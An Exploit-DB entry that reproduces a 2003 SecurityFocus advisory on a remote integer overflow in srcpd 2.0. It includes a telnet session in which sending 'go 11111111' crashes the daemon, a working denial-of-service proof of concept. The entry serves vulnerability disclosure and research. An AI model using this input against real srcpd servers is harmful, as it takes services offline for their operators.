Srcpd 2.0 - Remote Integer Overflow

EDB-ID:

23048

CVE:

N/A

EDB Verified:

Author:

Over_G

Type:

dos

Exploit:   /  

Platform:

Linux

Date:

2003-08-21

Vulnerable App: 
source: https://www.securityfocus.com/bid/8466/info

A vulnerability has been reported in srcpd that allows a remote attacker to cause a denial of service by exploiting an integer overflow error. The exploitation of this problem would consist of an attacker connecting to a server and issuing the "go" command with a large integer value, causing an overflow condition.

This issue would lead to a denial of service. Execution of arbitrary code may well be possible.

Srcpd v2.0 has been reported to be vulnerable to this issue, however older version may be affected as well. 

>[over@localhost m00]$ telnet localhost 12340
>Trying 127.0.0.1...
>Connected to localhost.
>Escape character is '^]'.
>srcpd V2; SRCP 0.8.2
>go 11111111
>1060333759.411 200 OK GO 1
>go 11111111
>Connection closed by foreign host.
>
>[over@localhost m00]$ telnet localhost 12340
>Trying 127.0.0.1...
>telnet: connect to address 127.0.0.1: Connection refused
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services